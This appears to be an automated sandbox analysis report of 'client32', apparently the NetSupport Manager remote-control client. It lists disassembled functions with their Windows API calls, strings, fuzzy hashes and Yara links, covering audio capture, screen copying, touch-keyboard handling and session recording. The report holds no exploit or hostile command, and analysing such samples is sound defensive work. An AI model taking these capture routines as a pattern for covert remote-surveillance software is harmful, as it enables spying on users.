Part of subcall function 11163AA5: GetLastError.KERNEL32(00000000,?,1116C666,00000000,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163ACD

wsprintfA.USER32 ref: 11071385
wsprintfA.USER32 ref: 110713FD
_memmove.LIBCMT ref: 1107144D

Strings

Warning. Bigneasy can't alloc %u, xrefs: 11071292
pEntry->sofar (%d) != pEntry->totlen (%d), uid=%u, pEntry=%xbigdata(%x)=%s, xrefs: 110714C1
Error: ignored last bigneasy data without earlier data (biguid=%d), xrefs: 11071263
%02x , xrefs: 1107137F, 11071490
..\ctl32\Connect.cpp, xrefs: 11071427
Error: %s, xrefs: 110714D4
too much data, biguid=%u, thislen=%d, sofar=%d, totlen=%d, more=%d, excess=%d, allzero=%d, Excess: %s, xrefs: 110713F7

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$Heap_malloc$AllocateErrorFreeLast_free_memmove_memset
String ID: %02x $..\ctl32\Connect.cpp$Error: %s$Error: ignored last bigneasy data without earlier data (biguid=%d)$Warning. Bigneasy can't alloc %u$pEntry->sofar (%d) != pEntry->totlen (%d), uid=%u, pEntry=%xbigdata(%x)=%s$too much data, biguid=%u, thislen=%d, sofar=%d, totlen=%d, more=%d, excess=%d, allzero=%d, Excess: %s
API String ID: 2245488504-3174212670
Opcode ID: aca9c1594e5399de51015283e02d49394ba0fa5bfefd87926b802ff875eee1f2
Instruction ID: ea22814be30d160bcc6a6f2f34e81bedc3e4793a1547ddc51286dcf2c7d1f429
Opcode Fuzzy Hash: aca9c1594e5399de51015283e02d49394ba0fa5bfefd87926b802ff875eee1f2
Instruction Fuzzy Hash: A8B18375E0521A9FDB24CF69CC84B9AF7F9BF44304F1085E9E48997280EB71AA84CF54

Uniqueness

Uniqueness Score: -1.00%

Function 1100B440 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 190fileCOMMON

Download Yara Rule

APIs

Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D

_malloc.LIBCMT ref: 1100B496

Part of subcall function 11163A11: __FF_MSGBANNER.LIBCMT ref: 11163A2A
Part of subcall function 11163A11: __NMSG_WRITE.LIBCMT ref: 11163A31
Part of subcall function 11163A11: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,1111023E,?,?,?,?,11145C02,?,?,?), ref: 11163A56

Part of subcall function 1100AD10: EnterCriticalSection.KERNEL32(000000FF,0CBC1010,?,00000000,00000000), ref: 1100AD54
Part of subcall function 1100AD10: LoadLibraryA.KERNEL32(Kernel32.dll), ref: 1100AD72
Part of subcall function 1100AD10: GetProcAddress.KERNEL32(?,CancelIo), ref: 1100ADBE
Part of subcall function 1100AD10: InterlockedExchange.KERNEL32(?,000000FF), ref: 1100AE05
Part of subcall function 1100AD10: CloseHandle.KERNEL32(00000000), ref: 1100AE0C
Part of subcall function 1100AD10: _free.LIBCMT ref: 1100AE23
Part of subcall function 1100AD10: FreeLibrary.KERNEL32(?), ref: 1100AE3B
Part of subcall function 1100AD10: LeaveCriticalSection.KERNEL32(?), ref: 1100AE45

EnterCriticalSection.KERNEL32(1100CB8A,Audio,DisableSounds,00000000,00000000,0CBC1010,?,1100CB7A,00000000,?,1100CB7A,?), ref: 1100B4CB
CreateFileA.KERNEL32(\\.\NSAudioFilter,C0000000,00000000,00000000,00000003,40000000,00000000,?,1100CB7A,?), ref: 1100B4E8
_calloc.LIBCMT ref: 1100B519
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,1100CB7A,?), ref: 1100B53F
LeaveCriticalSection.KERNEL32(1100CB8A,?,1100CB7A,?), ref: 1100B579
LeaveCriticalSection.KERNEL32(1100CB7A,?,?,1100CB7A,?), ref: 1100B59E

Strings

Vista AddAudioCapEvtListener(%p), xrefs: 1100B623
DisableSounds, xrefs: 1100B472
Audio, xrefs: 1100B477
Error. Vista AddAudioCaptureEventListener ret %s, xrefs: 1100B64C
Vista new pAudioCap=%p, xrefs: 1100B603
Error. Vista AudioCapture GetInstance ret %s, xrefs: 1100B5F3
InitCaptureSounds NT6, xrefs: 1100B5BE
\\.\NSAudioFilter, xrefs: 1100B4E0

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$Leave$CreateEnterLibrary$AddressAllocateCloseEventExchangeFileFreeHandleHeapInterlockedLoadProc__wcstoi64_calloc_free_malloc
String ID: Audio$DisableSounds$Error. Vista AudioCapture GetInstance ret %s$Error. Vista AddAudioCaptureEventListener ret %s$InitCaptureSounds NT6$Vista AddAudioCapEvtListener(%p)$Vista new pAudioCap=%p$\\.\NSAudioFilter
API String ID: 1843377891-2362500394
Opcode ID: b64cfe5d7525b2b467f806ca55118e923319f08bd0d657fe7081c590fb5a224e
Instruction ID: 79732c4921e51442e8b050610a6755ede2f12e6e97fc197f43339bcf40ac1e73
Opcode Fuzzy Hash: b64cfe5d7525b2b467f806ca55118e923319f08bd0d657fe7081c590fb5a224e
Instruction Fuzzy Hash: A25129B5E44A4AEFE704CF64DC80B9AF7A4FB05359F10467AE92993240E7317550CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 11018460 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 151COMMON

Download Yara Rule

APIs

Part of subcall function 11145C70: GetVersionExA.KERNEL32(111F1EF0,775EC740), ref: 11145CA0
Part of subcall function 11145C70: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 11145CDF
Part of subcall function 11145C70: _memset.LIBCMT ref: 11145CFD
Part of subcall function 11145C70: _strncpy.LIBCMT ref: 11145DCA

Part of subcall function 110183B0: GetSystemMetrics.USER32 ref: 110183BF
Part of subcall function 110183B0: GetSystemMetrics.USER32 ref: 110183DF

FindWindowA.USER32 ref: 110184C1
GetWindowRect.USER32 ref: 110184D9
GetWindowLongA.USER32 ref: 11018511
GetWindowLongA.USER32 ref: 11018518
ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000104,?,?,?,00000104), ref: 110185B8
wsprintfA.USER32 ref: 11018608

Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D

Strings

open, xrefs: 11018634
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TabTip.exe, xrefs: 11018551
IPTip_Main_Window, xrefs: 110184BC
c:\program files\common files\microsoft shared\ink\tabtip.exe, xrefs: 110185C5
e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 11018583
OpenKbd. No touch kbd, xrefs: 1101865D
OpenKbd keyrect(L=%d, T=%d, R=%d, B=%d), xrefs: 110184FB
IsA(), xrefs: 11018588

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$LongMetricsSystem$EnvironmentExpandFindOpenRectStringsVersion_free_memset_strncpywsprintf
String ID: IPTip_Main_Window$IsA()$OpenKbd keyrect(L=%d, T=%d, R=%d, B=%d)$OpenKbd. No touch kbd$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\TabTip.exe$c:\program files\common files\microsoft shared\ink\tabtip.exe$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$open
API String ID: 3321471459-1061909023
Opcode ID: 15256178f2c473d2d334685a5e7146fba412686c222059a35c988bc5f98f3eed
Instruction ID: 32505dac5387f753d5f4a5d6101e8c76b8228c83072960b34001c442d9572215
Opcode Fuzzy Hash: 15256178f2c473d2d334685a5e7146fba412686c222059a35c988bc5f98f3eed
Instruction Fuzzy Hash: FB51CF75D0122DABDB10DB64CD85FEEB7B4EB05714F1002D5E9296B2C4EB74AB40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 110061F0 Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 358COMMON

Download Yara Rule

APIs

ReleaseDC.USER32 ref: 11006267
InflateRect.USER32(?,?,?), ref: 11006306
SelectObject.GDI32(?,?), ref: 1100632D
MoveToEx.GDI32(?,?,?,00000000), ref: 110063D5
LineTo.GDI32(?,?,?), ref: 11006410
Polygon.GDI32(?,?,00000003), ref: 110064C8
SelectObject.GDI32(?,?), ref: 110064DC
SelectObject.GDI32(?,?), ref: 110064E6
InflateRect.USER32(?,?,?), ref: 11006522
SelectObject.GDI32(?,?), ref: 1100633D

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetDC.USER32(00000000), ref: 11006569

Part of subcall function 11002620: SetROP2.GDI32(?,00000007), ref: 11002631
Part of subcall function 11002620: SelectObject.GDI32(?,?), ref: 11002642
Part of subcall function 11002620: MoveToEx.GDI32(?,?,?,00000000), ref: 110026AF
Part of subcall function 11002620: LineTo.GDI32(?,00000000,?), ref: 110026E6

__floor_pentium4.LIBCMT ref: 11006621

Strings

m_hWnd, xrefs: 11006255, 11006558
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11006250, 11006553

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ObjectSelect$InflateLineMoveRect$ErrorExitLastMessagePolygonProcessRelease__floor_pentium4wsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 4043586968-2830328467
Opcode ID: f40b548af5a3b969317c6371caf9fc461ff3c483ba902ae5864a027bb338f110
Instruction ID: 40ef36492cbbdd63dd1a1365ef49c9bea88dfca2d0282d7a726c9572eb38d0e4
Opcode Fuzzy Hash: f40b548af5a3b969317c6371caf9fc461ff3c483ba902ae5864a027bb338f110
Instruction Fuzzy Hash: 75E14BB4E00B09DBCB14DFA9D984ADEFBF8FF48308F104529D46AA7254DB31A965CB50

Uniqueness

Uniqueness Score: -1.00%

Function 11004480 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 160windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 110044B4
CreateCompatibleBitmap.GDI32(?,?,?), ref: 110044E3
SelectObject.GDI32(00000000,00000000), ref: 110044F2
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11004526
SelectObject.GDI32(00000000,?), ref: 11004531
SelectObject.GDI32(00000000), ref: 1100454C
BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 11004580
SelectObject.GDI32(00000000,?), ref: 1100458B
DeleteDC.GDI32(00000000), ref: 11004592
DeleteObject.GDI32(00000000), ref: 110045A3
InvalidateRect.USER32(00000000,?,00000000), ref: 1100461F
InvalidateRect.USER32(00000000,00000000,00000000), ref: 11004650

Strings

m_hWnd, xrefs: 11004602, 1100463B
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110045FD, 11004636

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$CompatibleCreateDeleteInvalidateRect$Bitmap
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2105970896-2830328467
Opcode ID: 44e2563ee580fda99f72b7f2e742394cd111089d0a70a0d9a687529fd03971b7
Instruction ID: eb1414bd8fd2e4592000e36fc3863a3a49f4a7efc2cb9f7a10422fdc8de4f52e
Opcode Fuzzy Hash: 44e2563ee580fda99f72b7f2e742394cd111089d0a70a0d9a687529fd03971b7
Instruction Fuzzy Hash: 065147B5A40B059FD729CF68C885BBBB7F9FB88304F51456CE5AAD3244D770B8418B50

Uniqueness

Uniqueness Score: -1.00%

Function 11004670 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 158windowCOMMON

Download Yara Rule

APIs

CreateCompatibleDC.GDI32(?), ref: 11004696
CreateCompatibleBitmap.GDI32(?,?,?), ref: 110046C5
SelectObject.GDI32(00000000,00000000), ref: 110046D4
BitBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,00CC0020), ref: 11004708
SelectObject.GDI32(00000000,?), ref: 11004713
SelectObject.GDI32(00000000), ref: 1100472E
BitBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,00CC0020), ref: 11004762
SelectObject.GDI32(00000000,?), ref: 1100476D
DeleteDC.GDI32(00000000), ref: 11004774
DeleteObject.GDI32(00000000), ref: 11004785
InvalidateRect.USER32(00000000,?,00000000), ref: 1100480D
InvalidateRect.USER32(00000000,00000000,00000000), ref: 1100483E

Strings

m_hWnd, xrefs: 110047F0, 11004829
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110047EB, 11004824

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Object$Select$CompatibleCreateDeleteInvalidateRect$Bitmap
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 2105970896-2830328467
Opcode ID: 07b0e8ab4cb0965a99231c7aede8338b198f0b3d66306be4641f3ab29db112dc
Instruction ID: 36a692b57ef39b06e6f45b46f7478629122a6d466ff518be6ac3c34ba661c029
Opcode Fuzzy Hash: 07b0e8ab4cb0965a99231c7aede8338b198f0b3d66306be4641f3ab29db112dc
Instruction Fuzzy Hash: 7E514AB5A40704AFD725CF68C885BBBB7F9FB88344F11456CE5AA93244D774B841CB50

Uniqueness

Uniqueness Score: -1.00%

Function 1110F3F0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 218fileCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(0000017D,0CBC1010,0000017D,?,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001), ref: 1110F427
_memset.LIBCMT ref: 1110F4C2
SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 1110F4FA
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 1110F58E
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 1110F5B9
WriteFile.KERNEL32(?,PCIR,00000030,?,00000000), ref: 1110F5CE

Part of subcall function 11110000: InterlockedDecrement.KERNEL32(?), ref: 11110008

CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,1118B168,000000FF), ref: 1110F5F5
_free.LIBCMT ref: 1110F628
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 1110F665
timeEndPeriod.WINMM(00000001), ref: 1110F677
LeaveCriticalSection.KERNEL32(0000017D,?,?,?,?,?,?,?,1118B168,000000FF,?,1110F947,00000001,0CBC1010,0000017D,00000001), ref: 1110F681

Strings

End Record %s, xrefs: 1110F442
PCIR, xrefs: 1110F5C9, 1110F5CC

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: File$CloseCriticalHandlePointerSectionWrite$DecrementEnterInterlockedLeavePeriod_free_memsettime
String ID: End Record %s$PCIR
API String ID: 4278564793-2672865668
Opcode ID: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
Instruction ID: c7b3bd1ea8319edfd3cc52dfdc755cda258f2b25611d18eaf89bf58ef2166273
Opcode Fuzzy Hash: 2297d0fbe9251eaeeb3cc25f45a368d5b625df3f620643443588fc5d57948bb5
Instruction Fuzzy Hash: 32811875A0070AABD724CFA4C881BEBF7F8FF88704F00492DE66A97240D775A941CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1111D660 Relevance: 22.7, APIs: 15, Instructions: 153windowCOMMON

Download Yara Rule

APIs

CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 1111D6BE
CreateRectRgn.GDI32(?,?,?,?), ref: 1111D6E6
CombineRgn.GDI32(00000000,00000000,00000000,00000002), ref: 1111D6F7
DeleteObject.GDI32(?), ref: 1111D701
CreateRectRgn.GDI32(00000000,00000000,?,?), ref: 1111D735
CombineRgn.GDI32(00000000,00000000,00000000,00000004), ref: 1111D742
SelectClipRgn.GDI32(?,00000000), ref: 1111D759
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00000042), ref: 1111D783
SelectClipRgn.GDI32(?,00000000), ref: 1111D792
BitBlt.GDI32(?,?,?,?,?,?,00000000,00000000,00000042), ref: 1111D7BC
DeleteObject.GDI32(00000000), ref: 1111D7D1
SelectClipRgn.GDI32(?,00000000), ref: 1111D7E5
OffsetRgn.GDI32(00000000,?,?), ref: 1111D7FA
SelectClipRgn.GDI32(?,00000000), ref: 1111D808
DeleteObject.GDI32(00000000), ref: 1111D80F

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075841231.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075851998.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ClipSelect$CreateDeleteObjectRect$Combine$Offset
String ID:
API String ID: 3866515003-0
Opcode ID: fe86cac12546267f09bc71288f12fb1549db4e569b286baddfec6e8ac96b87dc
Instruction ID: 84ddac36778523c77c7e55966e0e7ea944c2670e4efe0413cf235aa62501f106
Opcode Fuzzy Hash: fe86cac12546267f09bc71288f12fb1549db4e569b286baddfec6e8ac96b87dc
Instruction Fuzzy Hash: 2C5143B5740615BFEB089BB0DD89FAAF7ACFB48309F004169F92996644D774BC40CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 11008270 Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 264windowCOMMON

Download Yara Rule

APIs

ReleaseDC.USER32 ref: 110082C5
_free.LIBCMT ref: 110083F3
SelectObject.GDI32(?,?), ref: 11008415
DeleteDC.GDI32(?), ref: 11008422
DeleteObject.GDI32(?), ref: 1100842F

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetDC.USER32(00000000), ref: 1100845D
CreateCompatibleDC.GDI32(00000000), ref: 1100846A
CreateCompatibleBitmap.GDI32(?,00000004,00000010), ref: 11008481
SelectObject.GDI32(?,00000000), ref: 11008495
_malloc.LIBCMT ref: 110084F5

Strings

m_hWnd, xrefs: 110082B3, 1100844C
e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110082AE, 11008447

Memory Dump Source

Source File: 00000012.00000002.1075447003.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000012.00000002.1075437959.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075708523.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000012.00000002.1075823631.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
